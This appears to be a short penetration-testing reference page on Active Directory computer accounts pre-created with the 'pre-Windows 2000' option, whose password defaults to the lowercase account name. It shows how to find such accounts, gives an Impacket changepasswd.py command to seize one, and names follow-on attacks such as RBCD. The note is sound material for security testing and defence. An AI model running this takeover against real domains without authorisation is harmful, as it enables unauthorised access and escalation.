👾 Overview
A legacy option when pre-creating a machine account insecurely sets it’s password to the account name in lowercase.
If a machine account is created with the Assign this computer account as a pre-Windows 2000 computer option checked, then it’s password gets set to the account name in lowercase. It’ll remain this way until it’s changed, or the machine actually gets onboarded to the domain.
🔍 Discovery
Accounts that have the UserAccountControl flags PASSWD_NOTREQD and WORKSTATION_TRUST_ACCOUNT, or a value of 4128 are pre-created accounts which haven’t been onboarded to the domain.
You can text this by authenticating to the account via SMB using the account’s lowercase username as the password. If the error STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT is shown, then you’ve successfully found a vulnerable account.
📌 Exploitation
To take control of this account and actually use it, we’ll need to change it’s password. One easy way to do this is using Impacket’s changepasswd.py.
changepasswd.py -protocol rpc-samr [DOMAIN]/[ACCOUNT NAME]\$@[DC IP] -newpass Password123✨ Post-Exploitation
The accounts can then be used to perpetuate further attacks, such as RBCD, or to get an initial user.
📝 Resources
| 🔗 Hyperlink | ℹ️ Info |
|---|---|
| TrustedSec | Pre Created Computer Account Writeup |